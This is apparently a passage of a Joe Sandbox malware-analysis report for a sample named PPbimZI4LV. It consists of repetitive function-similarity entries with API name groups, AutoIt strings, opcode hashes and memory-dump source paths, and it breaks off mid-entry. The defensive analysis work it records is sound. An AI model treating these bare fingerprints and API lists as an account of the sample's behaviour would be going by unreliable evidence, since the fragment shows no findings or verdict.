                                                                      • Opcode ID: b0feb0286f4ca27ef66cfe8d411df0543dc38ddff27f622ca5f85b38306fbd28
                                                                      • Instruction ID: 801dc908edfebbfc12c644c65e98f77f4908a11964ba8cd017d2ece0a84f6714
                                                                      • Opcode Fuzzy Hash: b0feb0286f4ca27ef66cfe8d411df0543dc38ddff27f622ca5f85b38306fbd28
                                                                      • Instruction Fuzzy Hash: 62317E21A0CB4689DAA0BF12E44616977A0FF44F90F488236DA5EE3796EF3CE4449B04
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AllocByteCharMultiStringWide
                                                                      • String ID:
                                                                      • API String ID: 3603722519-0
                                                                      • Opcode ID: 93ea2d3b49513d2c621701da2f2b18074182db1c16d81a142c075991106972fd
                                                                      • Instruction ID: d0b918edcca64a0ef93ae6613562457273c0ddece1973d9454b098af99d99f16
                                                                      • Opcode Fuzzy Hash: 93ea2d3b49513d2c621701da2f2b18074182db1c16d81a142c075991106972fd
                                                                      • Instruction Fuzzy Hash: B8314E21A0CA46C9EA60FF12E446179B3A0FB44F94F588236DA5D93796EF3CE5849700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: Msctls_Progress32
                                                                      • API String ID: 1025951953-3636473452
                                                                      • Opcode ID: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                      • Instruction ID: edf4b79cd68de493392f111b652c640fc03bd78a9b7f5c45f18f83260c89532e
                                                                      • Opcode Fuzzy Hash: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                      • Instruction Fuzzy Hash: AF318B3260869187E370AF65F486B1AB761EB88790F109139EB9993F59DF3CD845CF00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                      • String ID:
                                                                      • API String ID: 3220332590-0
                                                                      • Opcode ID: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                      • Instruction ID: 934baea954d45352c049706715da522fdc7208883fdad948854d4a9c9cf1adb0
                                                                      • Opcode Fuzzy Hash: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                      • Instruction Fuzzy Hash: 80A1F16AA1D65386E724BF7195057FE33A0FF04B58F141435EE1AE7A96FE399800E320
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                      • String ID:
                                                                      • API String ID: 3859894641-0
                                                                      • Opcode ID: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                                      • Instruction ID: 9a5d16685c016469e06cc489a315be4d35095967025bcd9938632d2cc1458ba2
                                                                      • Opcode Fuzzy Hash: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                                      • Instruction Fuzzy Hash: D7714E7292C64282EB2CBF25955617C6260FF85B90F148536D74EEB793FF2CE921A700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 564229958-0
                                                                      • Opcode ID: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                                      • Instruction ID: e56b2595f29529481a7f8dd4836021810c621e83b0e0e0e5a19e1798df95f957
                                                                      • Opcode Fuzzy Hash: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                                      • Instruction Fuzzy Hash: BD513522A1C682D9EB20FF60D8422ED6364FF94784F840032E65DE769BFFA8D645D740
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %.15g$0x%p$False$True
                                                                      • API String ID: 0-2263619337
                                                                      • Opcode ID: 6ff241166da0ffcb6c4ee16898f40362a6bd7710b3a4b369c581374a39075c3c
                                                                      • Instruction ID: 8f375d99199989b5acce32c1c76e6f276ddef1958954ede9d7507a4441b3c3a4
                                                                      • Opcode Fuzzy Hash: 6ff241166da0ffcb6c4ee16898f40362a6bd7710b3a4b369c581374a39075c3c
                                                                      • Instruction Fuzzy Hash: D8517122B0DA4289EF10FB65D1461BC2365EB45B88F288535DA1EE77DAEE39D405D340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                                      • String ID:
                                                                      • API String ID: 383626216-0
                                                                      • Opcode ID: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                      • Instruction ID: 6f26f6da34cefaed9504d9c548954a3b15eaa5bd486138bc7ddf43bce5854300
                                                                      • Opcode Fuzzy Hash: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                      • Instruction Fuzzy Hash: 0031B673B086528BE354EF61D4817AC33A1FB88748F500135EE0AA7685EF3CE545CB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                      • String ID:
                                                                      • API String ID: 1413079979-0
                                                                      • Opcode ID: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                      • Instruction ID: 366bc94bcc50202b55496f626c6c480ed53e4006eb728e30d2a135a905b8d7d2
                                                                      • Opcode Fuzzy Hash: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                      • Instruction Fuzzy Hash: 72319E3260CB8586D7A4AF02F4817AA77A4FB88B94F184036DE8D93B55EF3CD445DB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      • Opcode ID: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                                      • Instruction ID: 70dd06d0a54cff01e0e9d1821cfd6551550291187e10061a59ccf5dddc1e78b6
                                                                      • Opcode Fuzzy Hash: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                                      • Instruction Fuzzy Hash: 9C119E35B1870186EB48EF65990A02D66A1FB88BC1F148038CE5ED7B96EF3DD8058B00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                      • String ID:
                                                                      • API String ID: 43455801-0
                                                                      • Opcode ID: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                      • Instruction ID: 8aad530fd1716d53629eff5a6dbc79349fc39183048a49ffbd17b7c364201082
                                                                      • Opcode Fuzzy Hash: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                      • Instruction Fuzzy Hash: 3211C131B1829382E754BB16B80BB697B60EF85B84F484131CF0693B51EF7DE449CB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID:
                                                                      • API String ID: 4278518827-0
                                                                      • Opcode ID: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                      • Instruction ID: d9ad6eaf36490cc368fb192d73b4a950fdf05e66628b66504a4aa4ca1ffa53fe
                                                                      • Opcode Fuzzy Hash: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                      • Instruction Fuzzy Hash: 381112729096408AD788EF39DC491193BB2FB58B09B549034C249DF266FF39D49ACB11
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                      • String ID:
                                                                      • API String ID: 179993514-0
                                                                      • Opcode ID: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                      • Instruction ID: cabb6a871643e1d1bf18e02e18786d3fc9849d22f77b2a7e21b625fbcadcf60b
                                                                      • Opcode Fuzzy Hash: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                      • Instruction Fuzzy Hash: 4CF04421F1C75143F7947F76B84B6296291BF88785F845035D90ED2B56EF3CD4499B00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                      • String ID:
                                                                      • API String ID: 146765662-0
                                                                      • Opcode ID: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                      • Instruction ID: 334e14cf234431db210ac1a6c8831a54f5803fdcacb1fb7512c5332eed454199
                                                                      • Opcode Fuzzy Hash: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                      • Instruction Fuzzy Hash: 30F0C025A18A02C2EB44FF76D8560696361FF88FA5B149131CE2ED6375EF3CD4999700
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF6439BBF47), ref: 00007FF6439BCE29
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharLower
                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                      • API String ID: 2358735015-567219261
                                                                      • Opcode ID: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                      • Instruction ID: f47376f026e1d1cafc2da1e62282ee3800ef2a3687d59eea25963911156c84e1
                                                                      • Opcode Fuzzy Hash: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                      • Instruction Fuzzy Hash: 1891BE23B1DA5381EA64BF2588425B922A5BB14790B544531EE2DFB7C6FF3DE842E700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                      • API String ID: 4237274167-1221869570
                                                                      • Opcode ID: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                      • Instruction ID: 130273cb32876e4cce169f9b9d875439a3e8fd0de5c8f366bee36a040939a858
                                                                      • Opcode Fuzzy Hash: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                      • Instruction Fuzzy Hash: C3915826B0CB5285FB10FF65D4422AD33A5FB88B98B454436DE4EE7796EE38E805D340
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00007FF643990EDB
                                                                        • Part of subcall function 00007FF643990B90: CharUpperBuffW.USER32(?,?,00000001,00007FF643990F61), ref: 00007FF643990C6A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharForegroundUpperWindow
                                                                      • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                      • API String ID: 3570115564-1994484594
                                                                      • Opcode ID: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                      • Instruction ID: c3a46bfcbde08e43a42d9377fb1170e4505c07b838baa333a3900d17ea14629e
                                                                      • Opcode Fuzzy Hash: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                      • Instruction Fuzzy Hash: 23719C12B0DA43C9FA64BF66D8032B962A1BF54784F844431DA2EE6797FF3DE545A300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                      • API String ID: 3964851224-769500911
                                                                      • Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                      • Instruction ID: 251359a2008ef8925ed3ef0a20c0685c3005039d54c92af13c0094e29af5893c
                                                                      • Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                      • Instruction Fuzzy Hash: E241F723F1DA13C5EA607F258402179A2D9AF25BD4B140635DA5DE37C6FE3DEC42A300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                      • String ID: \*.*
                                                                      • API String ID: 3196045410-1173974218
                                                                      • Opcode ID: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                      • Instruction ID: 8abdc2784e8410c00e5ccc85fc89d3b176835c3077e09a1b9be8da326085d103
                                                                      • Opcode Fuzzy Hash: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                      • Instruction Fuzzy Hash: A8412162A0C65299EB60FF64D8421FD2760FF54798F840135DA4DE3B9AFF28D909D740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3113390036-3916222277
                                                                      • Opcode ID: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
